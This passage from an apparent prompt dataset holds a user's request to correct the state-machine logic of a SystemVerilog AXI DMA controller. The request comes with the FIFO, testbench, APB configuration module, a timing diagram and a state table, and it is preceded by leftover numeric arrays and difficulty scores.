0.96230975, 0.96230975, -1.03916644, -1.03916644, 0.96230975,
-1.03916644, -1.03916644]), 'high_output_3d': array([ 4.71621415, 1.19804116, 0.31770009, -0.22501563, -0.30162026,
-0.31233449, -0.15778335, 0.43421314, 1.16057897, 2.07421064,
1.29344201, 0.53835938, 0.57050691, -0.58676546, -0.52571156,
0.12002325, -0.25786155, -0.110555 , -0.10902045, -0.29153914,
-0.17690129, -0.28912251, 0.31835806, -0.4559358 , 1.08871261,
0.24579327, 0.09608714, 1.09025297, 2.37135817, 0.4561815 ,
0.60041093, -0.61320485, -0.4514938 , 0.75382567, 1.31791747,
0.82779958, 0.11432236, 0.4732649 , 0.56352854, 0.45719911,
0.68618582, 0.08102478, -0.60819462, -0.5348488 , -0.30054726,
-0.47880921, -0.48593665, 1.91444741, 1.95720714, 1.28850081,
-0.17376041, -0.28899098, -0.38571521, -0.29623437, 0.19290348,
0.53777091, -0.50303271, -0.19159167, 0.47239652, -0.1276774 ,
-0.46922441, 0.0985919 , 0.29047466, -0.1362923 , -0.06204193,
-0.55521201, -0.62714089, 0.14807491, 0.07160851, 0.46365286,
0.41919798, 0.54975556]), 'low_output_3d': array([ 7.93821628e-01, 7.18894557e-01, -2.81372512e-03, 2.45730132e-01,
1.87258780e-01, -1.70343833e-01, 8.69262170e-02, 5.70708808e-01,
-4.05961609e-01, 8.03443200e-01, 7.37376790e-01, 3.73622262e-01,
-9.10629954e-01, -2.10201374e+00, -1.74373748e+00, -9.78029617e-01,
-1.52272124e+00, 3.23609722e-02, -1.00934287e+00, -1.72951192e+00,
-8.79036989e-01, -4.76495181e+00, -4.19118861e+00, -5.20082219e+00,
-1.59190887e+00, -5.02233072e+00, -4.11093064e+00, -3.12963715e+00,
7.28575370e-01, -7.09322501e-01, -1.97269000e-01, -2.45740698e+00,
-2.20784836e+00, -5.49726690e-01, 2.26756294e-01, 4.00441400e-01,
1.03543158e-01, 6.82514466e-01, 4.81872944e-03, -3.65786369e-01,
7.86141671e-01, -1.73341638e+00, -2.24334653e+00, -1.00598601e+00,
-7.18323866e-01, -1.50515958e+00, -9.51473387e-01, 8.86262682e-03,
4.70123801e-01, 6.02921021e-01, -3.17845272e-01, -1.29657630e+00,
-9.96059673e-01, -1.14215218e+00, -1.22237889e+00, -2.75313245e+00,
-3.64993293e+00, -1.69470749e+00, 3.06855844e-01, -9.16321685e-01,
-1.32960783e+00, 2.43412283e-01, 6.57000836e-01, 6.79646580e-02,
1.87613539e-01, -3.59794214e-01, -3.34196260e-01, 4.02328539e-01,
6.18599808e-01, 2.75596678e-01, 7.42686937e-02, 8.03640765e-01]), 'priority_output_3d': array([-1.02860908, -1.02860908, -1.02860908, 0.97218664, 0.97218664,
-1.02860908, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, -1.02860908, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
0.97218664, 0.97218664, 0.97218664, -1.02860908, -1.02860908,
-1.02860908, -1.02860908, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, 0.97218664, 0.97218664, 0.97218664, 0.97218664,
0.97218664, 0.97218664, -1.02860908, -1.02860908, -1.02860908,
0.97218664, 0.97218664, 0.97218664, -1.02860908, 0.97218664,
0.97218664, 0.97218664, 0.97218664, -1.02860908, 0.97218664,
0.97218664, -1.02860908, -1.02860908, -1.02860908, 0.97218664,
0.97218664, 0.97218664, -1.02860908, -1.02860908, -1.02860908,
-1.02860908, 0.97218664]), 'high_output_5d': array([ 3.43085352, 0.74774032, 0.07635356, -0.30611401, -0.24030393,
-0.12262669, 1.08529305, 1.28186013, 0.96109604, 1.68590853,
0.82049719, 0.24463803, 0.26915515, -0.61343158, -0.5668692 ,
-0.07440348, -0.36259502, -0.25025257, -0.24908226, -0.38827902,
-0.30085117, -0.386436 , 0.07685536, -0.51365514, 0.66436156,
0.02151426, -0.0926582 , 0.66553631, 1.64256339, 0.18196556,
0.29196126, -0.63359542, -0.50970055, 0.74347945, 1.23870945,
0.62348067, 0.55365573, 0.85500748, 0.37646281, 0.18274164,
0.35737696, -0.10414542, -0.6297744 , -0.57383766, -0.39514902,
0.37495315, 0.71109134, 1.41311926, 1.4463189 , 0.81672882,
-0.29845579, -0.38633569, -0.46010183, -0.39185981, -0.01882181,
0.24418924, -0.54957331, -0.3120547 , 0.19433186, -0.26331086,
-0.52378961, 0.082117 , 0.05559025, -0.26988097, -0.21325437,
-0.40819043, -0.39626074, 0.45610495, 0.46116255, 0.25422073,
0.15376031, 0.25332925]), 'low_output_5d': array([ 0.86909012, 0.80749677, 0.21422077, 0.252387 , 0.37046874,
0.07650364, 0.28799096, 0.68568156, -0.11718455, 0.87699948,
0.27715391, -0.56802764, -0.64970248, -2.01012908, -1.63428184,
-0.58744965, -1.79860871, -1.02546824, -0.9926242 , -4.22306789,
-3.80560759, -3.93534411, -3.48586234, -5.42562259, -3.33341254,
-3.91204331, -3.1628323 , -2.35616582, 0.81545482, -0.67887223,
-0.63908216, -1.90576727, -1.59841483, -0.23536578, 0.40293744,
0.54571425, 0.30165081, 0.77759073, 0.22049498, -0.79445333,
-0.54246703, -1.22916553, -2.09930931, -1.5179469 , -0.80166265,
-1.0207737 , -0.56561926, 0.22381925, 0.60299625, 0.71216141,
-0.78197709, -1.44190642, -1.73645564, -2.81041725, -2.36248074,
-2.04666238, -2.78387187, -1.17659044, 0.171719 , -0.53672301,
-0.87646243, 0.41662939, 0.7566174 , 0.0657029 , 0.16446958,
-0.07923292, -0.05819027, 0.54726556, 0.72505007, 0.44308639,
0.27758591, 0.68488414]), 'priority_output_5d': array([-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, -1.02532046, -1.02532046, -1.02532046, 0.97530483,
0.97530483, 0.97530483, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, 0.97530483, 0.97530483, 0.97530483, 0.97530483,
0.97530483, -1.02532046, -1.02532046, 0.97530483, 0.97530483,
-1.02532046, -1.02532046, -1.02532046, -1.02532046, -1.02532046,
-1.02532046, 0.97530483])} of rank 0."
}
|
71d1a4b2812e7d696fba06b36c921555
|
{
"intermediate": 0.3511621356010437,
"beginner": 0.5076932907104492,
"expert": 0.14114464819431305
}
|
46,768
|
Please modify the code in "Please modify the code correctly" correctly.
<<<StartOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
module DMAC_ENGINE
(
input wire clk,
input wire rst_n, // _n means active low
// configuration registers
input wire [31:0] src_addr_i,
input wire [31:0] dst_addr_i,
input wire [15:0] byte_len_i,
input wire start_i,
output wire done_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (W channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
// mnemonics for state values
localparam S_IDLE = 3'd0,
S_RREQ = 3'd1,
S_RDATA = 3'd2,
S_WREQ = 3'd3,
S_WDATA = 3'd4;
reg [2:0] state, state_n;
reg [31:0] src_addr, src_addr_n;
reg [31:0] dst_addr, dst_addr_n;
reg [15:0] cnt, cnt_n;
reg [3:0] wcnt, wcnt_n;
reg arvalid,
rready,
awvalid,
wvalid,
wlast,
done;
wire fifo_full,
fifo_empty;
reg fifo_wren,
fifo_rden;
wire [31:0] fifo_rdata;
// it's desirable to code registers in a simple way
always_ff @(posedge clk)
if (!rst_n) begin
state <= S_IDLE;
src_addr <= 32'd0;
dst_addr <= 32'd0;
cnt <= 16'd0;
wcnt <= 4'd0;
end
else begin
state <= state_n;
src_addr <= src_addr_n;
dst_addr <= dst_addr_n;
cnt <= cnt_n;
wcnt <= wcnt_n;
end
// this block programs output values and next register values
// based on states.
always_comb begin
// START:Please modify the code correctly.
// START:Please modify the code correctly.
// START:Please modify the code correctly.
fifo_wren = 0;
fifo_rden = 0;
arvalid = 0;
awvalid = 0;
wvalid = 0;
rready = 0;
case (state)
S_IDLE: begin
done = 1'b1;
if (start_i && byte_len_i != 0) begin
state_n = S_RREQ;
end
end
S_RREQ: begin
arvalid = 1'b1;
if (arready_i) begin
state_n = S_RDATA;
src_addr_n = src_addr + 'd4;
//src_addr_n = src_addr + arlen_o;
end
end
S_RDATA: begin
rready = !fifo_full;
if (rvalid_i && !fifo_full) begin
fifo_wren = 1;
// src_addr_n = src_addr + arlen_o;
if (rlast_i) begin
state_n = S_WREQ;
end
else begin
state_n = S_RDATA;
end
end
end
S_WREQ: begin
awvalid = 1;
if (awready_i) begin
state_n = S_WDATA;
dst_addr_n = dst_addr + 'd4;
cnt_n = cnt - arlen_o;
end
if (!fifo_empty) begin
dst_addr_n = dst_addr + arlen_o;
end
end
S_WDATA: begin
wvalid = 1;
if (!fifo_empty && wready_i) begin
fifo_rden = 1;
// dst_addr_n = dst_addr + arlen_o;
if (wlast_o) begin
state_n = S_IDLE;
end
else begin
state_n = S_WDATA;
end
end
end
endcase
// END:Please modify the code correctly.
// END:Please modify the code correctly.
// END:Please modify the code correctly.
// **********************
end
DMAC_FIFO u_fifo
(
.clk (clk),
.rst_n (rst_n),
.full_o (fifo_full),
.wren_i (fifo_wren),
.wdata_i (rdata_i),
.empty_o (fifo_empty),
.rden_i (fifo_rden),
.rdata_o (fifo_rdata)
);
// Output assigments
assign done_o = done;
assign awid_o = 4'd0;
assign awaddr_o = dst_addr;
assign awlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign awsize_o = 3'b010; // 4 bytes per transfer
assign awburst_o = 2'b01; // incremental
assign awvalid_o = awvalid;
assign wid_o = 4'd0;
assign wdata_o = fifo_rdata;
assign wstrb_o = 4'b1111; // all bytes within 4 byte are valid
assign wlast_o = wlast;
assign wvalid_o = wvalid;
assign bready_o = 1'b1;
assign arvalid_o = arvalid;
assign araddr_o = src_addr;
assign arid_o = 4'd0;
assign arlen_o = (cnt >= 'd64) ? 4'hF: cnt[5:2]-4'h1;
assign arsize_o = 3'b010; // 4 bytes per transfer
assign arburst_o = 2'b01; // incremental
assign arvalid_o = arvalid;
assign rready_o = rready & !fifo_full;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_ENGINE.sv>>>
{ "signal": [
{ "name": "clk", "wave": "p....|....|.......|....." },
{ "name": "state", "wave": "2.3.4|....|..5.6..|..3.4", "data": ["IDLE", "RREQ", "RDATA", "WREQ", "WDATA", "RREQ"] },
{ "name": "write to CMD", "wave": "010..|....|.......|.....", "data": ["1"] },
{},
[ "AR ch",
{ "name": "ARVALID(out)", "wave": "0.1.0|....|.......|.....", "data": ["SRC"] },
{ "name": "ARADDR(out)", "wave": "x.3.x|....|.......|.....", "data": ["SRC"] },
{ "name": "ARLEN(out)", "wave": "2....|....|.......|.....", "data": ["15"] },
{ "name": "ARREADY(in)", "wave": "0..10|....|.......|....." },
],
[ "R ch",
{ "name": "RREADY(out)", "wave": "0...1|....|..0....|....." },
{ "name": "RVALID(in)", "wave": "0....|.1..|..0....|....." },
{ "name": "RLAST(in)", "wave": "0....|....|.10....|....." },
{ "name": "RDATA(in)", "wave": "x....|.444|44x....|.....", "data": ["D0", "D1", "D2", "D14", "D15"] },
],
[ "AW ch",
{ "name": "AWVALID(out)", "wave": "0....|....|..1.0..|....." },
{ "name": "AWADDR(out)", "wave": "x....|....|..5.x..|.....", "data": ["DST"] },
{ "name": "AWLEN(out)", "wave": "2....|....|.......|.....", "data": ["15"] },
{ "name": "AWREADY(in)", "wave": "0....|....|...10..|....." },
],
[ "W ch",
{ "name": "WVALID(out)", "wave": "0....|....|....1..|..0.." },
{ "name": "WDATA(out)", "wave": "x....|....|....444|44x..", "data": ["D0", "D1", "D2", "D14", "D15"] },
{ "name": "WLAST(out)", "wave": "0....|....|.......|.10.." },
{ "name": "WREADY(in)", "wave": "0....|....|....1..|..0.." }
]
],
"head" : {
"tick" : "0"
},
"foot" : {
"tick" : "0"
}
}
그림 3. DMA operation with burst transfers. At a time, a request reads/writes 16 cycles of data.
Please verify if the following table is correct using the code provided below.
+-------+-------------------------------------------------------------------------------------+------------+-----------------------------------------------------------+-----------------------------------------+
| State | Major outputs | Next State | Next state transition condition | Notes |
| +---------+--------+---------------------------------------+-------------------+------+ | | |
| | ARVALID | RREADY | AWVALID | WVALID | done | | | |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| IDLE | 0 | 0 | 0 | 0 | 1 | RREQ | (DMA_CMD.start is written as 1) and (DMA_LEN.byte_len!=0) | On moving out, |
| | | | | | | | | - Copy DMA_SRC to SRC_ADDR. |
| | | | | | | | | - Copy DMA_DST to DST_ADDR |
| | | | | | | | | - Copy DMA_LEN to the internal counter |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| RREQ | 1 | 0 | 0 | 0 | 0 | RDATA | ARREADY=1 | On moving out, |
| | | | | | | | | - Increment ARADDR by 4 |
| | | | | | | | | |
| | | | | | | | | ARLEN = (cnt>=64) ? 'hF : cnt[5:2]-4'h1 |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| RDATA | 0 | 1 | 0 | 0 | 0 | WREQ | (RVALID=1) & (RLAST) | Push data to FIFO |
| | | | | | +------------+-----------------------------------------------------------+-----------------------------------------+
| | | | | | | RDATA | (RVALID) & (!RLAST) | Push data to FIFO |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| WREQ | 0 | 0 | 1 | 0 | 0 | WDATA | AWREADY=1 | On moving out, |
| | | | AWLEN=(cnt>=64) ? 'hF : cnt[5:2]-4'h1 | | | | | - Increment AWADDR by 4 |
| | | | | | | | | - Decrement the internal counter by 4 |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
| WDATA | 0 | 0 | 0 | 1 | 0 | RREQ | (WREADY=1) (!WLAST) & (counter!=0) | Pop data from FIFO |
| | | | | WLAST=(wcnt=='d0) | | | | Decrement wcnt |
| | | | | | +------------+-----------------------------------------------------------+-----------------------------------------+
| | | | | | | IDLE | (WREADY=1) (WLAST) & (counter==0) | Pop data from FIFO |
+-------+---------+--------+---------------------------------------+-------------------+------+------------+-----------------------------------------------------------+-----------------------------------------+
<<<StartOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
module DMAC_FIFO #(
parameter DEPTH_LG2 = 4,
parameter DATA_WIDTH = 32
)
(
input wire clk,
input wire rst_n,
output wire full_o,
input wire wren_i,
input wire [DATA_WIDTH-1:0] wdata_i,
output wire empty_o,
input wire rden_i,
output wire [DATA_WIDTH-1:0] rdata_o
);
localparam FIFO_DEPTH = (1<<DEPTH_LG2);
reg [DATA_WIDTH-1:0] data[FIFO_DEPTH];
reg full, full_n,
empty, empty_n;
reg [DEPTH_LG2:0] wrptr, wrptr_n,
rdptr, rdptr_n;
// reset entries to all 0s
always_ff @(posedge clk)
if (!rst_n) begin
full <= 1'b0;
empty <= 1'b1; // empty after as reset
wrptr <= {(DEPTH_LG2+1){1'b0}};
rdptr <= {(DEPTH_LG2+1){1'b0}};
for (int i=0; i<FIFO_DEPTH; i++) begin
data[i] <= {DATA_WIDTH{1'b0}};
end
end
else begin
full <= full_n;
empty <= empty_n;
wrptr <= wrptr_n;
rdptr <= rdptr_n;
if (wren_i) begin
data[wrptr[DEPTH_LG2-1:0]] <= wdata_i;
end
end
always_comb begin
wrptr_n = wrptr;
rdptr_n = rdptr;
if (wren_i) begin
wrptr_n = wrptr + 'd1;
end
if (rden_i) begin
rdptr_n = rdptr + 'd1;
end
empty_n = (wrptr_n == rdptr_n);
full_n = (wrptr_n[DEPTH_LG2]!=rdptr_n[DEPTH_LG2])
&(wrptr_n[DEPTH_LG2-1:0]==rdptr_n[DEPTH_LG2-1:0]);
end
// synthesis translate_off
always @(posedge clk) begin
if (full_o & wren_i) begin
\$display("FIFO overflow");
@(posedge clk);
\$finish;
end
end
always @(posedge clk) begin
if (empty_o & rden_i) begin
\$display("FIFO underflow");
@(posedge clk);
\$finish;
end
end
// synthesis translate_on
assign full_o = full;
assign empty_o = empty;
assign rdata_o = data[rdptr[DEPTH_LG2-1:0]];
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_FIFO.sv>>>
<<<StartOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
`define IP_VER 32'h000
`define SRC_ADDR 32'h100
`define DST_ADDR 32'h104
`define LEN_ADDR 32'h108
`define STAT_ADDR 32'h110
`define START_ADDR 32'h10c
`define TIMEOUT_CYCLE 999999
module DMAC_TOP_TB ();
reg clk;
reg rst_n;
// clock generation
initial begin
clk = 1'b0;
forever #10 clk = !clk;
end
// reset generation
initial begin
rst_n = 1'b0; // active at time 0
repeat (3) @(posedge clk); // after 3 cycles,
rst_n = 1'b1; // release the reset
end
// enable waveform dump
initial begin
\$dumpvars(0, u_DUT);
\$dumpfile("dump.vcd");
end
// timeout
initial begin
#`TIMEOUT_CYCLE \$display("Timeout!");
\$finish;
end
APB apb_if (.clk(clk));
AXI_AW_CH aw_ch (.clk(clk));
AXI_W_CH w_ch (.clk(clk));
AXI_B_CH b_ch (.clk(clk));
AXI_AR_CH ar_ch (.clk(clk));
AXI_R_CH r_ch (.clk(clk));
task test_init();
int data;
apb_if.init();
@(posedge rst_n); // wait for a release of the reset
repeat (10) @(posedge clk); // wait another 10 cycles
apb_if.read(`IP_VER, data);
\$display("---------------------------------------------------");
\$display("IP version: %x", data);
\$display("---------------------------------------------------");
\$display("---------------------------------------------------");
\$display("Reset value test");
\$display("---------------------------------------------------");
apb_if.read(`SRC_ADDR, data);
if (data===0)
\$display("DMA_SRC(pass): %x", data);
else begin
\$display("DMA_SRC(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`DST_ADDR, data);
if (data===0)
\$display("DMA_DST(pass): %x", data);
else begin
\$display("DMA_DST(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`LEN_ADDR, data);
if (data===0)
\$display("DMA_LEN(pass): %x", data);
else begin
\$display("DMA_LEN(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.read(`STAT_ADDR, data);
if (data===1)
\$display("DMA_STATUS(pass): %x", data);
else begin
\$display("DMA_STATUS(fail): %x", data);
@(posedge clk);
\$finish;
end
endtask
task test_dma(input int src, input int dst, input int len);
int data;
int word;
realtime elapsed_time;
\$display("---------------------------------------------------");
\$display("Load data to memory");
\$display("---------------------------------------------------");
for (int i=src; i<(src+len); i=i+4) begin
word = \$random;
u_mem.write_word(i, word);
end
\$display("---------------------------------------------------");
\$display("Configuration test");
\$display("---------------------------------------------------");
apb_if.write(`SRC_ADDR, src);
apb_if.read(`SRC_ADDR, data);
if (data===src)
\$display("DMA_SRC(pass): %x", data);
else begin
\$display("DMA_SRC(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.write(`DST_ADDR, dst);
apb_if.read(`DST_ADDR, data);
if (data===dst)
\$display("DMA_DST(pass): %x", data);
else begin
\$display("DMA_DST(fail): %x", data);
@(posedge clk);
\$finish;
end
apb_if.write(`LEN_ADDR, len);
apb_if.read(`LEN_ADDR, data);
if (data===len)
\$display("DMA_LEN(pass): %x", data);
else begin
\$display("DMA_LEN(fail): %x", data);
@(posedge clk);
\$finish;
end
\$display("---------------------------------------------------");
\$display("DMA start");
\$display("---------------------------------------------------");
apb_if.write(`START_ADDR, 32'h1);
elapsed_time = \$realtime;
\$display("---------------------------------------------------");
\$display("Wait for a DMA completion");
\$display("---------------------------------------------------");
data = 0;
while (data!=1) begin
apb_if.read(`STAT_ADDR, data);
repeat (100) @(posedge clk);
end
@(posedge clk);
elapsed_time = \$realtime - elapsed_time;
\$timeformat(-9, 0, " ns", 10);
\$display("Elapsed time for DMA: %t", elapsed_time);
\$display("---------------------------------------------------");
\$display("DMA completed");
\$display("---------------------------------------------------");
repeat (len) @(posedge clk); // to make sure data is written
\$display("---------------------------------------------------");
\$display("verify data");
\$display("---------------------------------------------------");
for (int i=0; i<len; i=i+4) begin
logic [31:0] src_word;
logic [31:0] dst_word;
src_word = u_mem.read_word(src+i);
dst_word = u_mem.read_word(dst+i);
if (src_word!==dst_word) begin
\$display("Mismatch! (src:%x @%x, dst:%x @%x", src_word, src+i, dst_word, dst+i);
end
end
endtask
int src,
dst,
len;
// main
initial begin
test_init();
src = 'h0000_1000;
dst = 'h0000_2000;
len = 'h0100;
\$display("===================================================");
\$display("= 1st trial");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
src = 'h1234_1234;
dst = 'hABCD_ABCC;
len = 'h0F00;
\$display("===================================================");
\$display("= 2nd trial (long transfer)");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
src = 'h4278_0000;
dst = 'h4278_1000;
len = 'h0F10;
\$display("===================================================");
\$display("= 3rd trial (long transfer-2)");
\$display("= Copying %x bytes from %x to %x", len, src, dst);
\$display("===================================================");
test_dma(src, dst, len);
\$finish;
end
AXI_SLAVE u_mem (
.clk (clk),
.rst_n (rst_n),
.aw_ch (aw_ch),
.w_ch (w_ch),
.b_ch (b_ch),
.ar_ch (ar_ch),
.r_ch (r_ch)
);
DMAC_TOP u_DUT (
.clk (clk),
.rst_n (rst_n),
// APB interface
.psel_i (apb_if.psel),
.penable_i (apb_if.penable),
.paddr_i (apb_if.paddr[11:0]),
.pwrite_i (apb_if.pwrite),
.pwdata_i (apb_if.pwdata),
.pready_o (apb_if.pready),
.prdata_o (apb_if.prdata),
.pslverr_o (apb_if.pslverr),
// AXI AW channel
.awid_o (aw_ch.awid),
.awaddr_o (aw_ch.awaddr),
.awlen_o (aw_ch.awlen),
.awsize_o (aw_ch.awsize),
.awburst_o (aw_ch.awburst),
.awvalid_o (aw_ch.awvalid),
.awready_i (aw_ch.awready),
// AXI W channel
.wid_o (w_ch.wid),
.wdata_o (w_ch.wdata),
.wstrb_o (w_ch.wstrb),
.wlast_o (w_ch.wlast),
.wvalid_o (w_ch.wvalid),
.wready_i (w_ch.wready),
// AXI B channel
.bid_i (b_ch.bid),
.bresp_i (b_ch.bresp),
.bvalid_i (b_ch.bvalid),
.bready_o (b_ch.bready),
// AXI AR channel
.arid_o (ar_ch.arid),
.araddr_o (ar_ch.araddr),
.arlen_o (ar_ch.arlen),
.arsize_o (ar_ch.arsize),
.arburst_o (ar_ch.arburst),
.arvalid_o (ar_ch.arvalid),
.arready_i (ar_ch.arready),
// AXI R channel
.rid_i (r_ch.rid),
.rdata_i (r_ch.rdata),
.rresp_i (r_ch.rresp),
.rlast_i (r_ch.rlast),
.rvalid_i (r_ch.rvalid),
.rready_o (r_ch.rready)
);
endmodule
<<<EndOfFile:DMAC/SIM/TB/DMAC_TOP_TB.sv>>>
<<StartOfFile:DMAC/RTL/DMAC_CFG.sv>>>
module DMAC_CFG
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// configuration registers
output reg [31:0] src_addr_o,
output reg [31:0] dst_addr_o,
output reg [15:0] byte_len_o,
output wire start_o,
input wire done_i
);
// Configuration register to read/write
reg [31:0] src_addr;
reg [31:0] dst_addr;
reg [15:0] byte_len;
//----------------------------------------------------------
// Write
//----------------------------------------------------------
// an APB write occurs when PSEL & PENABLE & PWRITE
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// wren : _______----_____________________________
//
// DMA start command must be asserted when APB writes 1 to the DMA_CMD
// register
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ___--------_____________________________
// paddr : |DMA_CMD|
// pwdata : | 1 |
// start : _______----_____________________________
wire wren = psel_i & penable_i & pwrite_i;
always @(posedge clk) begin
if (!rst_n) begin
src_addr <= 32'd0;
dst_addr <= 32'd0;
byte_len <= 16'd0;
end
else if (wren) begin
case (paddr_i)
'h100: src_addr <= pwdata_i[31:0];
'h104: dst_addr <= pwdata_i[31:0];
'h108: byte_len <= pwdata_i[15:0];
endcase
end
end
wire start = wren & (paddr_i=='h10C) & pwdata_i[0];
//----------------------------------------------------------
// READ
//----------------------------------------------------------
// an APB read occurs when PSEL & PENABLE & !PWRITE
// To make read data a direct output from register,
// this code shall buffer the muxed read data into a register
// in the SETUP cycle (PSEL & !PENABLE)
// clk : __--__--__--__--__--__--__--__--__--__--
// psel : ___--------_____________________________
// penable : _______----_____________________________
// pwrite : ________________________________________
// reg update : ___----_________________________________
// prdata : |DATA
reg [31:0] rdata;
always @(posedge clk) begin
if (!rst_n) begin
rdata <= 32'd0;
end
else if (psel_i & !penable_i & !pwrite_i) begin // in the setup cycle in the APB state diagram
case (paddr_i)
'h0: rdata <= 32'h0001_2024;
'h100: rdata <= src_addr;
'h104: rdata <= dst_addr;
'h108: rdata <= {16'd0, byte_len};
'h110: rdata <= {31'd0, done_i};
default: rdata <= 32'd0;
endcase
end
end
// output assignments
assign pready_o = 1'b1;
assign prdata_o = rdata;
assign pslverr_o = 1'b0;
assign src_addr_o = src_addr;
assign dst_addr_o = dst_addr;
assign byte_len_o = byte_len;
assign start_o = start;
endmodule
<<<EndOfFile:DMAC/RTL/DMAC_CFG.sv>>>
<<<StartOfFile:DMAC/RTL/DMAC_TOP.sv>>>
module DMAC_TOP
(
input wire clk,
input wire rst_n, // _n means active low
// AMBA APB interface
input wire psel_i,
input wire penable_i,
input wire [11:0] paddr_i,
input wire pwrite_i,
input wire [31:0] pwdata_i,
output reg pready_o,
output reg [31:0] prdata_o,
output reg pslverr_o,
// AMBA AXI interface (AW channel)
output wire [3:0] awid_o,
output wire [31:0] awaddr_o,
output wire [3:0] awlen_o,
output wire [2:0] awsize_o,
output wire [1:0] awburst_o,
output wire awvalid_o,
input wire awready_i,
// AMBA AXI interface (AW channel)
output wire [3:0] wid_o,
output wire [31:0] wdata_o,
output wire [3:0] wstrb_o,
output wire wlast_o,
output wire wvalid_o,
input wire wready_i,
// AMBA AXI interface (B channel)
input wire [3:0] bid_i,
input wire [1:0] bresp_i,
input wire bvalid_i,
output wire bready_o,
// AMBA AXI interface (AR channel)
output wire [3:0] arid_o,
output wire [31:0] araddr_o,
output wire [3:0] arlen_o,
output wire [2:0] arsize_o,
output wire [1:0] arburst_o,
output wire arvalid_o,
input wire arready_i,
// AMBA AXI interface (R channel)
input wire [3:0] rid_i,
input wire [31:0] rdata_i,
input wire [1:0] rresp_i,
input wire rlast_i,
input wire rvalid_i,
output wire rready_o
);
wire [31:0] src_addr;
wire [31:0] dst_addr;
wire [15:0] byte_len;
wire start;
wire done;
DMAC_CFG u_cfg(
.clk (clk),
.rst_n (rst_n),
// AMBA APB interface
.psel_i (psel_i),
.penable_i (penable_i),
.paddr_i (paddr_i),
.pwrite_i (pwrite_i),
.pwdata_i (pwdata_i),
.pready_o (pready_o),
.prdata_o (prdata_o),
.pslverr_o (pslverr_o),
.src_addr_o (src_addr),
.dst_addr_o (dst_addr),
.byte_len_o (byte_len),
.start_o (start),
.done_i (done)
);
DMAC_ENGINE u_engine(
.clk (clk),
.rst_n (rst_n),
// configuration registers
.src_addr_i (src_addr),
.dst_addr_i (dst_addr),
.byte_len_i (byte_len),
.start_i (start),
.done_o (done),
// AMBA AXI interface (AW channel)
.awid_o (awid_o),
.awaddr_o (awaddr_o),
.awlen_o (awlen_o),
.awsize_o (awsize_o),
.awburst_o (awburst_o),
.awvalid_o (awvalid_o),
.awready_i (awready_i),
// AMBA AXI interface (W channel)
.wid_o (wid_o),
.wdata_o (wdata_o),
.wstrb_o (wstrb_o),
.wlast_o (wlast_o),
.wvalid_o (wvalid_o),
.wready_i (wready_i),
// AMBA AXI interface (B channel)
.bid_i (bid_i),
.bresp_i (bresp_i),
.bvalid_i (bvalid_i),
.bready_o (bready_o),
// AMBA AXI interface (AR channel)
.arid_o (arid_o),
.araddr_o (araddr_o),
.arlen_o (arlen_o),
.arsize_o (arsize_o),
.arburst_o (arburst_o),
.arvalid_o (arvalid_o),
.arready_i (arready_i),
